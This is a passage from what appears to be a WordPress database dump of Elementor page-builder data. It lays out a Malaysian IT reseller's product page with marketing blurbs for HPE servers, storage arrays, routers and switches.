center;\\\"><strong>HPE Synergy 12000 Frame<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2515\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Synergy-12000-Frame.png\\\" alt=\\\"\\\" width=\\\"226\\\" height=\\\"170\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE Synergy 12000 Frames are uniquely architected as Composable Infrastructure (CI) to match the powerful \'infrastructure-as-code\' capabilities of the HPE intelligent software architecture. Flexible access to compute, storage, and fabric resources allows for use and re-purposing. Linking multiple HPE Synergy Frames efficiently scales the infrastructure with a dedicated single view of the entire management network.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"62e0e2d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"40915d9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Synergy D3940 Storage Module<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2516\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Synergy-D3940-Storage-Module.png\\\" alt=\\\"\\\" width=\\\"222\\\" height=\\\"166\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Synergy D3940 Storage Module provides a fluid pool of storage resources for the Composable Infrastructure. Additional capacity for compute modules is easily provisioned and intelligently managed with integrated data services for availability and protection. The 40 SFF drive bays per storage module can be populated with 12 G SAS or 6 G SATA drives. Expand up to 4 storage modules in a single Synergy 12000 Frame for a total of 200 drives.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"70339e4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6a96ca1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"57c8c89\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da0887c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"57c273b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"296570e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d7056bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"34066b9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f501a1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"bb27a6b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"-1\",\"right\":\"-1\",\"bottom\":\"-1\",\"left\":\"-1\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"2cf5757\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Data Storage<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Flash storage-integrated, built-for-the-cloud data protection that delivers unparalleled backup, archive and disaster recovery for your enterprise apps.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"efbecc6\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"243cf87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"c45d541\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE StoreOnce Systems<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\">\\u00a0<br \\/><img class=\\\"alignnone wp-image-2517\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-StoreOnce-Systems.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"156\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c301724\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"c16a918\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE 3PAR StoreServ 8000 Storage<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2518\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-3PAR-StoreServ-8000-Storage.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"166\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesn\\u2019t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af04195\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"b45681b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE 3PAR StoreServ 9000 Storage<\\/strong><\\/h4>\\n\\n<hr \\/>\\n&nbsp;\\n<img class=\\\"wp-image-2519 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-3PAR-StoreServ-9000-Storage.png\\\" alt=\\\"\\\" width=\\\"222\\\" height=\\\"171\\\" \\/>\\n<p style=\\\"text-align: center;\\\">HPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads \\u2013 for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4ffd0fc\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"75f50e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"cb4169e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"067e237\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"3849c5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5f98d0c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"8d4989d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11168cd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f816ee3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4cef774\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"85f9784\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ea7fd08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bb3eeba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>NETWORKING<\\/h2>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"021e064\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3645aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"-1\",\"right\":\"-1\",\"bottom\":\"-1\",\"left\":\"-1\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"d34cd1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Router<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Navigate more devices and simplify complex networks with intelligent management of open standards routing.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"304f150\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c7392b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"687ac33\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE FLexNetwork MSR95x Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2520\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-FLexNetwork-MSR95x-Router-Series.png\\\" alt=\\\"\\\" width=\\\"227\\\" height=\\\"171\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE MSR95x Router Series delivers high-performance, small branch routing in a single, cost-optimized form factor. Featuring integrated routing, switching, wireless, security, and voice with no additional licensing, boost your service delivery while simplifying the management of the corporate WAN. This series is flexible to deploy, with Zero Touch Provisioning and WAN options with LTE connectivity. With Comware v7 and fiber connections, the MSR95x also brings the performance and advanced services available on modular routers, such as IPS and high encryption, to a fixed port form factor.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e505229\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"65af13d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Alcatel-Lucent 7750 Service Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2521\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Alcatel-Lucent-7750-Service-Router-Series.png\\\" alt=\\\"\\\" width=\\\"229\\\" height=\\\"171\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The Alcatel-Lucent 7750 Service Router (SR) is a high-performance, multiservice, edge router designed for the concurrent support of advanced end user, business and mobile services on a common IP edge platform. Leveraging the Alcatel-Lucent in-house 400 Gb\\/s FP3 silicon technology, the 7750 SR enables a wide range of IP services for large enterprises and operators with exceptional performance, scale and service intelligence requirements. The 7750 SR utilizes the Alcatel-Lucent Service Router Operating System (SR OS) and supports service-aware management to enhance operational efficiency.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f17738e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"6eb923f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE FlexNetwork MSR93x Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2522\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-FlexNetwork-MSR93x-Router-Series.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"188\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE MSR93x Router Series delivers a high-performance small-branch router providing integrated routing, switching, security, SIP, 802.11n WLAN connectivity, and 4G LTE\\/3G in a single unit. With its Converged Infrastructure, it enables faster time to service and enhanced performance while simplifying your network through a single management screen and zero-touch deployment. The MSR93x increases flexibility and agility, delivering extensive connectivity capabilities in a compact, fixed form factor. The MSR93x is based on open standards for seamless integration within small-branch deployment.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4335c67\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"964afb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f168dc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"479f0a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"4f95a1f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3f5f006\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"fed6471\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4419ab2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"145a6dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5715260\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aeec70b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"50f2e58\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"99ae68c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Switches<\\/strong><\\/h2>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"823bc65\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f135ea8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f3e7bd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2523\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png\\\" alt=\\\"\\\" width=\\\"219\\\" height=\\\"165\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Altoline 6921 Switch Series is an x86-based OCP certified, open-networking, disaggregated family of low-latency 10GbE data center switches in a 1U form factor. Perfect for deployment in web-scale environments as a 10GbE server access switch; optimized for data center hot\\/cold aisle deployments with reversible airflow. Hardware support for VXLAN is ideal for deployment in multi-tenancy and overlay environments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2d0f78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"9dd34f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2524\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png\\\" alt=\\\"\\\" width=\\\"217\\\" height=\\\"164\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE Altoline 6960 Switch Series is an open-networking, disaggregated family of low latency 100\\/50\\/25GbE data center switches in a 1U form factor. Perfect for deployment in data center environments as 25GbE server access, or 100\\/50GbE spine switches. It is optimized for data center hot\\/cold aisle deployments with reversible airflow. The hardware support for VXLAN makes the Altoline 6960 ideal for deployment in multi-tenancy and overlay environments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5490442\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0fae7b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c4c6953\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7341cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"af59a7b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ac4e02\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"fa822d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"9\",\"right\":\"9\",\"bottom\":\"9\",\"left\":\"9\",\"isLinked\":true}},\"elements\":[{\"id\":\"608d110\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">To discover more, please click the button below or contact us to discuss your needs.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8609,3656,'_elementor_edit_mode','builder'),(8610,3656,'_elementor_template_type','wp-page'),(8627,3657,'_elementor_version','2.7.4'),(8628,3655,'_wp_trash_meta_status','draft'),(8395,3632,'_wp_page_template','template-fullwidth.php'),(8396,3632,'_elementor_edit_mode','builder'),(8397,3632,'_elementor_template_type','post'),(8398,3632,'_elementor_version','2.5.14'),(8399,3632,'_elementor_data','[{\"id\":\"e3617cd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"43a7986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2911cf1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>SERVER AND SYSTEM<\\/h2>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5d09ee\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ea019d6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"-1\",\"right\":\"-1\",\"bottom\":\"-1\",\"left\":\"-1\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"50f056f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Rack Servers<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Rack-optimized servers that modernize your data center by delivering performance, resiliency, and scalability for core business-to-business-critical workloads.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6ba1eaa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"736e3d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"bf473fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant DL325 Gen10 Server<\\/strong><\\/h4><hr \\/><p><img class=\\\"wp-image-2509 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-DL325-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"181\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Secure and versatile single socket (1P) 1U AMD EPYC\\u2122 based platform offers an exceptional balance of processor, memory and I\\/O for virtualization and data intensive workloads. With up to 32 cores, up to 16 DIMMs, 2 TB memory capacity and support for up to 10 NVMe drives, this server delivers 2P performance with 1P economics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ba9d094\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f64c755\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant DL385 Gen10 Server<\\/strong><\\/h4><hr \\/><p><img class=\\\"wp-image-2511 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-DL385-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"181\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Hewlett Packard Enterprise is extending the worlds most secure industry standard servers to include the HPE ProLiant DL385 Gen10 server, utilizing the AMD EPYC 7000 Series processors. This platform has been designed with the security you need and the flexibility you require to accommodate demanding enterprise workloads. With up to 64 cores, up to 32 DIMMs, or 4 TB memory capacity and support for up to 24 NVMe drives, the HPE ProLiant DL385 Gen10 server delivers a low cost virtual machine (VM) with unprecedented security.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e4020c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"4e09160\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Apollo 6000 Chassis<\\/strong><\\/h4><hr \\/><p><img class=\\\"alignnone wp-image-2512 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Apollo-6000-Chassis.png\\\" alt=\\\"\\\" width=\\\"235\\\" height=\\\"160\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Apollo k6000 Chassis is designed with density optimization and HPC solution integration in mind to address these demands. The new modular, fully integrated, and highly flexible chassis is designed to hold the Hewlett Packard Enterprise Gen10 compute servers to fit your specific HPC workloads. It accommodates up to 24 HPE ProLiant XL230k Gen 10 Server trays, redundant power and cooling, Ethernet and high speed fabric switches to address various HPC workload needs. It is a performance optimized, air-cooled solution that fits in customer\\u2019s space limitations. This solution offers outstanding configuration flexibility, simplified administration and rack-scale efficiency that lowers the total cost of ownership (TCO) needed for mass scale HPC 